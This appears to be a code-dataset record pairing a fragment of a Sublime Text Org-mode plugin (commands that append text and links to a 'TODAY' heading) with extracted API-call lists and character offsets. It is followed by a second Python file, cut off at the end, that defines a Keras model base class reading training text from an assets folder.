currentView = window.active_view()
view = window.open_file(file.filename, sublime.ENCODED_POSITION)
window.focus_view(currentView)
return view
# ================================================================================
class RunEditingCommandOnToday:
def __init__(self, view, command, cmds = {}):
self.view = view
self.command = command
self.cmds = cmds
def onSaved(self):
db.Get().Reload(self.savedView)
evt.EmitIf(self.onDone)
def onEdited(self):
# NOTE the save here doesn't seem to be working
# Not sure why. BUT...
view = self.savedView
view.run_command("save")
sublime.set_timeout_async(lambda: self.onSaved(), 100)
def onLoaded(self):
view = self.savedView
self.n.move_cursor_to(view)
eventName = util.RandomString()
evt.Get().once(eventName, self.onEdited)
log.debug("Trying to run: " + self.command)
cmds = self.cmds
cmds["onDone"] = eventName
view.run_command(self.command, cmds)
def Run(self,onDone = None):
self.onDone = onDone
idValue = "TODAY"
file, at = db.Get().FindByCustomId(idValue)
if(file != None and at != None):
node = file.At(at)
if(node):
self.n = node
self.f = file
self.savedView = get_view_for_silent_edit_file(file)
# Give time for the document to be opened.
sublime.set_timeout_async(lambda: self.onLoaded(), 200)
return
else:
log.warning("COULD NOT LOCATE TODAY")
else:
log.warning("Could not locate today")
# Append text to a node
class OrgAppendTextCommand(sublime_plugin.TextCommand):
def run(self, edit, text="", onDone=None):
curNode = db.Get().AtInView(self.view)
if(not curNode):
file = db.Get().FindInfo(self.view)
if(len(file.org) > 0):
curNode = file.org[len(file.org) - 1]
if(not curNode):
level = 1
l = self.view.line(self.view.size())
reg = sublime.Region(l.start(),l.start())
reg = here
else:
level = curNode.level
reg = curNode.region(self.view)
if(level == 0):
level = 1
here = sublime.Region(view.size(),view.size())
else:
here = sublime.Region(reg.end(),reg.end())
self.view.sel().clear()
self.view.sel().add(reg.end() + 1)
#self.view.show(here)
self.view.insert(edit,self.view.sel()[0].begin(),'\n' + (' '*(level*2)) + text)
evt.EmitIf(onDone)
class OrgLinkToTodayCommand(sublime_plugin.TextCommand):
def OnDone(self):
evt.EmitIf(self.onDone)
def InsertLink(self):
self.ed = RunEditingCommandOnToday(self.view, "org_append_text", {'text': self.link})
self.ed.Run(evt.Make(self.OnDone))
def run(self, edit, onDone=None):
self.onDone = onDone
# Schedule this item so it is in the agenda
self.view.run_command("org_schedule", {"dateval": str(datetime.datetime.now())})
# Create a link to the current location so we can insert it in our today item
self.link = orglink.CreateLink(self.view)
curNode = db.Get().AtInView(self.view)
# Should we add a heading to this?
if(curNode and not curNode.is_root()):
self.ed = RunEditingCommandOnToday(self.view, "org_insert_text_as_child_heading", {'heading': curNode.heading})
self.ed.Run(evt.Make(self.InsertLink))
else:
self.InsertLink()
class OrgEnterOnHeadingCommand(sublime_plugin.TextCommand):
def run(self, edit, Indent=1):
indent = (" " * Indent) + " "
self.view.run_command("org_internal_insert", {"location": self.view.sel()[0].begin(), "text": "\n" + indent})
| [
"logging.getLogger",
"re.compile",
"OrgExtended.orgparse.date.OrgDateFreeFloating.from_str",
"OrgExtended.orgparse.date.OrgDate.format_clock",
"sublime.Region",
"OrgExtended.pymitter.Get",
"OrgExtended.orgproperties.UpdateProperty",
"sublime.active_window",
"OrgExtended.orglinks.CreateLink",
"OrgE... | [((961, 988), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (978, 988), False, 'import logging\n'), ((1694, 1732), 're.compile', 're.compile', (['"""^\\\\s*CLOSED:\\\\s*\\\\[.*\\\\]"""'], {}), "('^\\\\s*CLOSED:\\\\s*\\\\[.*\\\\]')\n", (1704, 1732), False, 'import re\n'), ((4792, 4856), 're.compile', 're.compile', (['"""\\\\s(?P<time><\\\\s*\\\\d+-\\\\d+-\\\\d+\\\\s+[^>]+>)(\\\\s+|$)"""'], {}), "('\\\\s(?P<time><\\\\s*\\\\d+-\\\\d+-\\\\d+\\\\s+[^>]+>)(\\\\s+|$)')\n", (4802, 4856), False, 'import re\n'), ((33143, 33217), 're.compile', 're.compile', (['"""^(?P<heading>[*]+[^:]+\\\\s*)(\\\\s+(?P<tags>[:]([^: ]+[:])+))?$"""'], {}), "('^(?P<heading>[*]+[^:]+\\\\s*)(\\\\s+(?P<tags>[:]([^: ]+[:])+))?$')\n", (33153, 33217), False, 'import re\n'), ((3660, 3679), 'OrgExtended.orgparse.node.root.startup', 'node.root.startup', ([], {}), '()\n', (3677, 3679), True, 'import OrgExtended.orgparse.node as node\n'), ((4672, 4691), 'OrgExtended.orgparse.node.root.startup', 'node.root.startup', ([], {}), '()\n', (4689, 4691), True, 'import OrgExtended.orgparse.node as node\n'), ((13819, 13864), 'OrgExtended.orgnumberedlist.findChildrenByIndent', 'numberedlist.findChildrenByIndent', (['view', 'line'], {}), '(view, line)\n', (13852, 13864), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((36271, 36294), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (36292, 36294), False, 'import sublime\n'), ((2086, 2109), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2107, 2109), False, 'import datetime\n'), ((2894, 2912), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (2904, 2912), True, 'import OrgExtended.pymitter as evt\n'), ((3267, 3323), 'OrgExtended.orgparse.node.get_timestamps', 'node.get_timestamps', ([], {'active': '(True)', 'point': '(True)', 'range': '(True)'}), '(active=True, point=True, range=True)\n', (3286, 3323), True, 'import OrgExtended.orgparse.node as node\n'), ((3933, 3956), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3954, 3956), False, 'import datetime\n'), ((4001, 4063), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['view', 'node', '"""LAST_REPEAT"""', 'stamp', 'onDone'], {}), "(view, node, 'LAST_REPEAT', stamp, onDone)\n", (4021, 4063), True, 'import OrgExtended.orgproperties as props\n'), ((4185, 4205), 'OrgExtended.pymitter.Make', 'evt.Make', (['OnLogAdded'], {}), '(OnLogAdded)\n', (4193, 4205), True, 'import OrgExtended.pymitter as evt\n'), ((4308, 4331), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4329, 4331), False, 'import datetime\n'), ((4995, 5018), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (5005, 5018), True, 'import OrgExtended.pymitter as evt\n'), ((10968, 10991), 're.compile', 're.compile', (['self.todoRe'], {}), '(self.todoRe)\n', (10978, 10991), False, 'import re\n'), ((12858, 12877), 're.compile', 're.compile', (['self.Re'], {}), '(self.Re)\n', (12868, 12877), False, 'import re\n'), ((14192, 14214), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14206, 14214), False, 'import sublime\n'), ((14249, 14271), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14263, 14271), False, 'import sublime\n'), ((14543, 14588), 'OrgExtended.orgnumberedlist.findChildrenByIndent', 'numberedlist.findChildrenByIndent', (['view', 'line'], {}), '(view, line)\n', (14576, 14588), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((15394, 15416), 'sublime.Region', 'sublime.Region', (['ep', 'np'], {}), '(ep, np)\n', (15408, 15416), False, 'import sublime\n'), ((16440, 16478), 'OrgExtended.orgnumberedlist.isNumberedLine', 'numberedlist.isNumberedLine', (['self.view'], {}), '(self.view)\n', (16467, 16478), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((17064, 17086), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (17078, 17086), False, 'import sublime\n'), ((27334, 27352), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (27344, 27352), True, 'import OrgExtended.pymitter as evt\n'), ((28437, 28455), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (28447, 28455), True, 'import OrgExtended.pymitter as evt\n'), ((28569, 28592), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (28590, 28592), False, 'import datetime\n'), ((28612, 28651), 'OrgExtended.orgparse.date.OrgDate.format_date', 'orgdate.OrgDate.format_date', (['now', '(False)'], {}), '(now, False)\n', (28639, 28651), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((28823, 28846), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (28844, 28846), False, 'import datetime\n'), ((28866, 28906), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(False)'], {}), '(now, False)\n', (28894, 28906), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((29078, 29101), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (29099, 29101), False, 'import datetime\n'), ((29121, 29159), 'OrgExtended.orgparse.date.OrgDate.format_date', 'orgdate.OrgDate.format_date', (['now', '(True)'], {}), '(now, True)\n', (29148, 29159), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((29329, 29352), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (29350, 29352), False, 'import datetime\n'), ((29372, 29411), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(True)'], {}), '(now, True)\n', (29400, 29411), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((34507, 34530), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (34517, 34530), True, 'import OrgExtended.pymitter as evt\n'), ((35241, 35258), 'OrgExtended.orginsertselected.OrgInput', 'insSel.OrgInput', ([], {}), '()\n', (35256, 35258), True, 'import OrgExtended.orginsertselected as insSel\n'), ((37023, 37046), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (37033, 37046), True, 'import OrgExtended.pymitter as evt\n'), ((37396, 37415), 'OrgExtended.orgutil.util.RandomString', 'util.RandomString', ([], {}), '()\n', (37413, 37415), True, 'import OrgExtended.orgutil.util as util\n'), ((39290, 39308), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['onDone'], {}), '(onDone)\n', (39300, 39308), True, 'import OrgExtended.pymitter as evt\n'), ((39397, 39420), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (39407, 39420), True, 'import OrgExtended.pymitter as evt\n'), ((39900, 39929), 'OrgExtended.orglinks.CreateLink', 'orglink.CreateLink', (['self.view'], {}), '(self.view)\n', (39918, 39929), True, 'import OrgExtended.orglinks as orglink\n'), ((5633, 5656), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5654, 5656), False, 'import datetime\n'), ((8367, 8400), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_close_if_needed'], {}), '(self.do_close_if_needed)\n', (8375, 8400), True, 'import OrgExtended.pymitter as evt\n'), ((9139, 9193), 're.compile', 're.compile', (['"""^([*]+ (\\\\[\\\\#[a-zA-Z0-9]+\\\\]\\\\s+)?)( )*"""'], {}), "('^([*]+ (\\\\[\\\\#[a-zA-Z0-9]+\\\\]\\\\s+)?)( )*')\n", (9149, 9193), False, 'import re\n'), ((11969, 12018), 're.compile', 're.compile', (["('^([*]+\\\\s+(' + todos + ')?\\\\s*)( )*')"], {}), "('^([*]+\\\\s+(' + todos + ')?\\\\s*)( )*')\n", (11979, 12018), False, 'import re\n'), ((15472, 15494), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15486, 15494), False, 'import sublime\n'), ((16533, 16581), 'OrgExtended.orgnumberedlist.getListAtPointForSorting', 'numberedlist.getListAtPointForSorting', (['self.view'], {}), '(self.view)\n', (16570, 16581), True, 'import OrgExtended.orgnumberedlist as numberedlist\n'), ((17426, 17448), 'sublime.Region', 'sublime.Region', (['bs', 'be'], {}), '(bs, be)\n', (17440, 17448), False, 'import sublime\n'), ((18706, 18737), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (18727, 18737), False, 'import sublime\n'), ((18750, 18789), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (18768, 18789), True, 'import OrgExtended.orgneovi as nvi\n'), ((19782, 19813), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (19803, 19813), False, 'import sublime\n'), ((19826, 19865), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (19844, 19865), True, 'import OrgExtended.orgneovi as nvi\n'), ((29741, 29762), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (29749, 29762), True, 'import OrgExtended.pymitter as evt\n'), ((30023, 30044), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (30031, 30044), True, 'import OrgExtended.pymitter as evt\n'), ((30621, 30666), 'OrgExtended.orgparse.date.OrgDateFreeFloating.from_str', 'orgdate.OrgDateFreeFloating.from_str', (['dateval'], {}), '(dateval)\n', (30657, 30666), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((31359, 31390), 'sublime.Region', 'sublime.Region', (['insertpt', 'endpt'], {}), '(insertpt, endpt)\n', (31373, 31390), False, 'import sublime\n'), ((32416, 32430), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (32428, 32430), True, 'import OrgExtended.orgparse.node as node\n'), ((32862, 32885), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (32883, 32885), False, 'import datetime\n'), ((32909, 32949), 'OrgExtended.orgparse.date.OrgDate.format_clock', 'orgdate.OrgDate.format_clock', (['now', '(False)'], {}), '(now, False)\n', (32937, 32949), True, 'import OrgExtended.orgparse.date as orgdate\n'), ((34242, 34259), 'OrgExtended.orginsertselected.OrgInput', 'insSel.OrgInput', ([], {}), '()\n', (34257, 34259), True, 'import OrgExtended.orginsertselected as insSel\n'), ((35355, 35377), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.on_done'], {}), '(self.on_done)\n', (35363, 35377), True, 'import OrgExtended.pymitter as evt\n'), ((35677, 35691), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (35689, 35691), True, 'import OrgExtended.orgparse.node as node\n'), ((36102, 36174), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['self.view', 'node', '"""CUSTOM_ID"""', 'idValue', 'self.onDone'], {}), "(self.view, node, 'CUSTOM_ID', idValue, self.onDone)\n", (36122, 36174), True, 'import OrgExtended.orgproperties as props\n'), ((39562, 39583), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (39570, 39583), True, 'import OrgExtended.pymitter as evt\n'), ((2196, 2209), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (2207, 2209), True, 'import OrgExtended.orgparse.node as node\n'), ((5257, 5265), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (5263, 5265), True, 'import OrgExtended.orgdb as db\n'), ((7868, 7913), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.on_update_timestamps_if_needed'], {}), '(self.on_update_timestamps_if_needed)\n', (7876, 7913), True, 'import OrgExtended.pymitter as evt\n'), ((8111, 8149), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_recurrence_if_needed'], {}), '(self.do_recurrence_if_needed)\n', (8119, 8149), True, 'import OrgExtended.pymitter as evt\n'), ((8212, 8250), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_recurrence_if_needed'], {}), '(self.do_recurrence_if_needed)\n', (8220, 8250), True, 'import OrgExtended.pymitter as evt\n'), ((9962, 9994), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.do_note_if_needed'], {}), '(self.do_note_if_needed)\n', (9970, 9994), True, 'import OrgExtended.pymitter as evt\n'), ((10084, 10092), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (10090, 10092), True, 'import OrgExtended.orgdb as db\n'), ((11144, 11161), 'sublime.version', 'sublime.version', ([], {}), '()\n', (11159, 11161), False, 'import sublime\n'), ((12572, 12580), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (12578, 12580), True, 'import OrgExtended.orgdb as db\n'), ((13030, 13047), 'sublime.version', 'sublime.version', ([], {}), '()\n', (13045, 13047), False, 'import sublime\n'), ((14399, 14421), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14413, 14421), False, 'import sublime\n'), ((14464, 14486), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14478, 14486), False, 'import sublime\n'), ((14783, 14805), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (14797, 14805), False, 'import sublime\n'), ((14848, 14870), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (14862, 14870), False, 'import sublime\n'), ((15734, 15756), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15748, 15756), False, 'import sublime\n'), ((16682, 16726), 'OrgExtended.orgcheckbox.getListAtPointForSorting', 'checkbox.getListAtPointForSorting', (['self.view'], {}), '(self.view)\n', (16715, 16726), True, 'import OrgExtended.orgcheckbox as checkbox\n'), ((17827, 17835), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (17833, 17835), True, 'import OrgExtended.orgdb as db\n'), ((18325, 18333), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (18331, 18333), True, 'import OrgExtended.orgdb as db\n'), ((18892, 18900), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (18898, 18900), True, 'import OrgExtended.orgdb as db\n'), ((19395, 19403), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (19401, 19403), True, 'import OrgExtended.orgdb as db\n'), ((20631, 20662), 'sublime.set_clipboard', 'sublime.set_clipboard', (['nodetext'], {}), '(nodetext)\n', (20652, 20662), False, 'import sublime\n'), ((20679, 20718), 'OrgExtended.orgneovi.TestAndSetClip', 'nvi.TestAndSetClip', (['self.view', 'nodetext'], {}), '(self.view, nodetext)\n', (20697, 20718), True, 'import OrgExtended.orgneovi as nvi\n'), ((21605, 21613), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (21611, 21613), True, 'import OrgExtended.orgdb as db\n'), ((22260, 22282), 'sublime.Region', 'sublime.Region', (['sp', 'sp'], {}), '(sp, sp)\n', (22274, 22282), False, 'import sublime\n'), ((22629, 22637), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (22635, 22637), True, 'import OrgExtended.orgdb as db\n'), ((23370, 23392), 'sublime.Region', 'sublime.Region', (['sp', 'sp'], {}), '(sp, sp)\n', (23384, 23392), False, 'import sublime\n'), ((23983, 23991), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (23989, 23991), True, 'import OrgExtended.orgdb as db\n'), ((25589, 25597), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (25595, 25597), True, 'import OrgExtended.orgdb as db\n'), ((27578, 27586), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (27584, 27586), True, 'import OrgExtended.orgdb as db\n'), ((30737, 30745), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (30743, 30745), True, 'import OrgExtended.orgdb as db\n'), ((30790, 30804), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (30802, 30804), True, 'import OrgExtended.orgparse.node as node\n'), ((32372, 32380), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (32378, 32380), True, 'import OrgExtended.orgdb as db\n'), ((33356, 33364), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (33362, 33364), True, 'import OrgExtended.orgdb as db\n'), ((33955, 33978), 'OrgExtended.pymitter.EmitIf', 'evt.EmitIf', (['self.onDone'], {}), '(self.onDone)\n', (33965, 33978), True, 'import OrgExtended.pymitter as evt\n'), ((34308, 34329), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (34316, 34329), True, 'import OrgExtended.pymitter as evt\n'), ((34656, 34677), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.OnDone'], {}), '(self.OnDone)\n', (34664, 34677), True, 'import OrgExtended.pymitter as evt\n'), ((35086, 35155), 'OrgExtended.orgproperties.UpdateProperty', 'props.UpdateProperty', (['self.view', 'node', '"""CUSTOM_ID"""', 'text', 'self.onDone'], {}), "(self.view, node, 'CUSTOM_ID', text, self.onDone)\n", (35106, 35155), True, 'import OrgExtended.orgproperties as props\n'), ((35335, 35343), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35341, 35343), True, 'import OrgExtended.orgdb as db\n'), ((35625, 35633), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35631, 35633), True, 'import OrgExtended.orgdb as db\n'), ((35811, 35819), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35817, 35819), True, 'import OrgExtended.orgdb as db\n'), ((35954, 36004), 'OrgExtended.orgproperties.RemoveProperty', 'props.RemoveProperty', (['self.view', 'node', '"""CUSTOM_ID"""'], {}), "(self.view, node, 'CUSTOM_ID')\n", (35974, 36004), True, 'import OrgExtended.orgproperties as props\n'), ((36020, 36028), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (36026, 36028), True, 'import OrgExtended.orgdb as db\n'), ((36073, 36087), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (36085, 36087), True, 'import OrgExtended.orgparse.node as node\n'), ((36983, 36991), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (36989, 36991), True, 'import OrgExtended.orgdb as db\n'), ((37424, 37433), 'OrgExtended.pymitter.Get', 'evt.Get', ([], {}), '()\n', (37431, 37433), True, 'import OrgExtended.pymitter as evt\n'), ((37730, 37738), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (37736, 37738), True, 'import OrgExtended.orgdb as db\n'), ((38438, 38446), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (38444, 38446), True, 'import OrgExtended.orgdb as db\n'), ((39948, 39956), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (39954, 39956), True, 'import OrgExtended.orgdb as db\n'), ((40215, 40240), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.InsertLink'], {}), '(self.InsertLink)\n', (40223, 40240), True, 'import OrgExtended.pymitter as evt\n'), ((15854, 15876), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15868, 15876), False, 'import sublime\n'), ((25691, 25699), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (25697, 25699), True, 'import OrgExtended.orgdb as db\n'), ((27651, 27659), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (27657, 27659), True, 'import OrgExtended.orgdb as db\n'), ((31700, 31721), 'OrgExtended.pymitter.Make', 'evt.Make', (['self.insert'], {}), '(self.insert)\n', (31708, 31721), True, 'import OrgExtended.pymitter as evt\n'), ((34294, 34302), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (34300, 34302), True, 'import OrgExtended.orgdb as db\n'), ((34997, 35005), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (35003, 35005), True, 'import OrgExtended.orgdb as db\n'), ((35054, 35068), 'OrgExtended.orgparse.node.is_root', 'node.is_root', ([], {}), '()\n', (35066, 35068), True, 'import OrgExtended.orgparse.node as node\n'), ((38511, 38519), 'OrgExtended.orgdb.Get', 'db.Get', ([], {}), '()\n', (38517, 38519), True, 'import OrgExtended.orgdb as db\n'), ((39767, 39790), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (39788, 39790), False, 'import datetime\n'), ((2444, 2457), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (2455, 2457), True, 'import OrgExtended.orgparse.node as node\n'), ((15030, 15052), 'sublime.Region', 'sublime.Region', (['sp', 'ep'], {}), '(sp, ep)\n', (15044, 15052), False, 'import sublime\n'), ((15111, 15133), 'sublime.Region', 'sublime.Region', (['sp', 'np'], {}), '(sp, np)\n', (15125, 15133), False, 'import sublime\n'), ((31302, 31315), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (31313, 31315), True, 'import OrgExtended.orgparse.node as node\n'), ((31441, 31454), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (31452, 31454), True, 'import OrgExtended.orgparse.node as node\n'), ((6010, 6033), 'OrgExtended.orgagenda.EnsureDateTime', 'oa.EnsureDateTime', (['next'], {}), '(next)\n', (6027, 6033), True, 'import OrgExtended.orgagenda as oa\n'), ((25126, 25149), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (25147, 25149), False, 'import sublime\n'), ((25389, 25412), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (25410, 25412), False, 'import sublime\n'), ((26988, 27011), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (27009, 27011), False, 'import sublime\n'), ((27255, 27278), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (27276, 27278), False, 'import sublime\n'), ((33007, 33020), 'OrgExtended.orgparse.node.indent', 'node.indent', ([], {}), '()\n', (33018, 33020), True, 'import OrgExtended.orgparse.node as node\n'), ((6191, 6214), 'OrgExtended.orgagenda.EnsureDateTime', 'oa.EnsureDateTime', (['next'], {}), '(next)\n', (6208, 6214), True, 'import OrgExtended.orgagenda as oa\n')] |
from nt import DirEntry
import os
import self as self
from keras import Model as KerasModel
class Model(object):
"""
Base class for the different models in this project
"""
_files: dict = {}
""" The files that is used to parse the model """
_raw_content: str = ''
""" The files contents as one long string """
_assets_path: str = 'assets_test'
""" Path to the assets to read from """
_model: KerasModel = None
""" The Keras model that is used """
_model_path: str = None
""" The path where to save and use the model from """
_activation_method: str = 'softmax'
""" Activation method to use """
_optimizer: str = 'adam'
""" Optimizer method to use """
_loss_method: str = 'categorical_crossentropy'
""" Loss method to use """
_training_data_encoding: str = 'utf-8'
""" The encoding used on the training data """
def print_model_summary(self) -> self:
"""
Returns a model summary if the model has been created
:return: str
"""
if self._model:
self._model.summary()
return
print('No model has been created yet')
return self
def load_weights(self, weights: str) -> self:
"""
Loads weights from the given weights file
:param weights:
:return: self
"""
if not self._model:
print('No model has been created, please create the model first!')
return
self._model.load_weights(weights)
self.compile_model()
return self
def compile_model(self) -> self:
"""
Compiles the model and runs some optimizer on it
:return: self
"""
if not self._model:
print('No model has been created, please create the model first!')
return
self._model.compile(loss=self._loss_method, optimizer=self._optimizer)
return self
def _read_data_from_assets(self) -> self:
"""
Reads and parses the data from the assets folder into the object itself
:return: self
"""
for directory in os.scandir(self._get_assets_full_path()):
self._parse_directory(directory)
return self
def _concat_assets_content_to_one_string(self) -> self:
"""
Concatenates the contents from all the assets to one string
:return: self
"""
for key, value in self._files.items():
self._raw_content = self._raw_content + value
self._raw_content = self._raw_content.lower()
return self
def _parse_directory(self, directory: DirEntry) -> self:
"""
Recursively parses the given directory and starts to parse any found files
:param directory:
:return: self
"""
entry: DirEntry
for entry in os.scandir(directory):
if entry.is_dir():
self._parse_directory(entry)
else:
self._parse_file(entry)
return self
def _parse_file(self, file: DirEntry) -> self:
"""
Tries to parse the given file and puts it in self._files dictionary
:param file: DirEntry
:return: self
"""
data: str
try:
with open(file.path, 'r', encoding=self._training_data_encoding) as file_reader:
data = file_reader.read()
file_reader.close()
except Exception:
print(f"Unable to parse file: {file.path}")
return
self._files[file.path] = data
return self
def _get_assets_full_path(self) -> str:
"""
Returns a computed full path to the directory where the assets are located as a string
:return: str
"""
return os.path.join(os.path.dirname(os.path.dirname(__file__)), self._assets_path)
| [
"self._parse_directory",
"self._get_assets_full_path",
"self.compile_model",
"self._model.load_weights",
"os.scandir",
"self._raw_content.lower",
"os.path.dirname",
"self._model.summary",
"self._model.compile",
"self._parse_file",
"self._files.items"
] | [((1510, 1543), 'self._model.load_weights', 'self._model.load_weights', (['weights'], {}), '(weights)\n', (1534, 1543), True, 'import self as self\n'), ((1552, 1572), 'self.compile_model', 'self.compile_model', ([], {}), '()\n', (1570, 1572), True, 'import self as self\n'), ((1870, 1940), 'self._model.compile', 'self._model.compile', ([], {'loss': 'self._loss_method', 'optimizer': 'self._optimizer'}), '(loss=self._loss_method, optimizer=self._optimizer)\n', (1889, 1940), True, 'import self as self\n'), ((2469, 2488), 'self._files.items', 'self._files.items', ([], {}), '()\n', (2486, 2488), True, 'import self as self\n'), ((2577, 2602), 'self._raw_content.lower', 'self._raw_content.lower', ([], {}), '()\n', (2600, 2602), True, 'import self as self\n'), ((2886, 2907), 'os.scandir', 'os.scandir', (['directory'], {}), '(directory)\n', (2896, 2907), False, 'import os\n'), ((1094, 1115), 'self._model.summary', 'self._model.summary', ([], {}), '()\n', (1113, 1115), True, 'import self as self\n'), ((2171, 2199), 'self._get_assets_full_path', 'self._get_assets_full_path', ([], {}), '()\n', (2197, 2199), True, 'import self as self\n'), ((2214, 2246), 'self._parse_directory', 'self._parse_directory', (['directory'], {}), '(directory)\n', (2235, 2246), True, 'import self as self\n'), ((2956, 2984), 'self._parse_directory', 'self._parse_directory', (['entry'], {}), '(entry)\n', (2977, 2984), True, 'import self as self\n'), ((3019, 3042), 'self._parse_file', 'self._parse_file', (['entry'], {}), '(entry)\n', (3035, 3042), True, 'import self as self\n'), ((3861, 3886), 